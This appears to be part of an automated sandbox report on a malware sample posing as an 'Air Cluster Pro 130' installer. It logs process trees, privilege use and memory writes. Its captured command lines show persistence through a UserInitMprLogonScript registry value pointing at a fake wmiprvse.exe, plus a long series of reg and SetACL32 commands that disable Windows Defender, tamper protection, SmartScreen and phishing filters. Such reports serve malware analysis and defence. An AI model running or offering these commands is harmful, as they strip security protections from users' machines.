N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\svchost.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: 0 N/A C:\Windows\System32\Conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: 0 N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: 0 N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: 0 N/A C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4624 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp
PID 4624 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp
PID 4624 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp
PID 4220 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe
PID 4220 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe
PID 4220 wrote to memory of 4372 N/A C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe
PID 4372 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp
PID 4372 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp
PID 4372 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp
PID 4204 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe
PID 4204 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe
PID 4204 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe
PID 4192 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp
PID 4192 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp
PID 4192 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp
PID 1036 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 204 wrote to memory of 3840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\expand.exe
PID 204 wrote to memory of 3840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\expand.exe
PID 204 wrote to memory of 3840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\expand.exe
PID 1036 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 4536 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4536 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4536 wrote to memory of 4816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1036 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
PID 1036 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
PID 1036 wrote to memory of 2628 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe
PID 1036 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 1036 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 1612 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 1612 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 1612 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4204 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe
PID 4204 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe
PID 4204 wrote to memory of 204 N/A C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 204 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe C:\Windows\SysWOW64\cmd.exe
PID 204 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe C:\Windows\SysWOW64\cmd.exe
PID 204 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe C:\Windows\SysWOW64\cmd.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4200 wrote to memory of 3228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe
PID 4200 wrote to memory of 3228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe
PID 4200 wrote to memory of 3228 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe
PID 4200 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\svchost.exe
PID 4200 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\svchost.exe
PID 4200 wrote to memory of 5088 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\svchost.exe
PID 4200 wrote to memory of 3100 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe
PID 4200 wrote to memory of 3100 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe
PID 4200 wrote to memory of 3100 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4200 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe
PID 4200 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe

"C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"

C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp

"C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp" /SL5="$801C8,833540,832512,C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"

C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp" /SL5="$20262,938139,832512,C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe

"C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2217

C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp

"C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp" /SL5="$202EE,9877208,832512,C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2217

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-V1SDH.tmp\{app}\cvysapfvmvsjevb.cab -F:* %ProgramData%

C:\Windows\SysWOW64\expand.exe

expand C:\Users\Admin\AppData\Local\Temp\is-V1SDH.tmp\{app}\cvysapfvmvsjevb.cab -F:* C:\ProgramData

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\wmiprvse.exe" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe" /f

C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe

"C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c start https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i^&c=5306757^&pl=0x00^&pb=1^&px=2217

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe

"C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe" 992217

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\do32.bat

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

